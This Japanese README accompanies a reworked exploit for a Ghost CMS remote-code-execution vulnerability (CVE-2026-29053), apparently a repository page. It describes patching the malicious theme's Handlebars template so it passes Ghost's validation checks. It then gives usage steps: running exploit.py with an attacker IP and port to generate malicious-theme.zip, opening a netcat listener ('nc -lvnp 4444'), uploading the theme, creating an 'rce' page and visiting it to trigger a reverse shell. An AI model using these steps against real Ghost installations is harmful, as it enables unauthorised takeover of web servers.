
Ghost CMSで発見された(RCE)脆弱性(具体的にはバージョン0.7.2から6.19.0に影響)
これは、同じCVEに対するrootxran氏のリポジトリのリワーク版です - https://github.com/rootxran/CVE-2026-29053
特定のGhost CMS環境でのテスト中に、元のテーマペイロードが致命的なHandlebarsエラーを引き起こしました。CMSは、author.hbsファイル内で非推奨または欠落したヘルパー(social_url)を参照していたため、悪意のあるテーマのアクティベーションに失敗しました。
Handlebarsテンプレートをネイティブで互換性のあるヘルパーを使用するように更新しました。これにより、テーマがGhostの内部検証チェックを通過し、テーマエンジンのセーフティパーサーによってブロックされることなく、エクスプロイトが正常にアクティベーションされます。
使用方法:(動画ガイドについては元のエクスプロイトを参照してください)。
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip
1. nc -lvnp 4444
2. テーマをアップロードし、スラッグ「rce」でページを作成する
3. /rce/ にアクセスする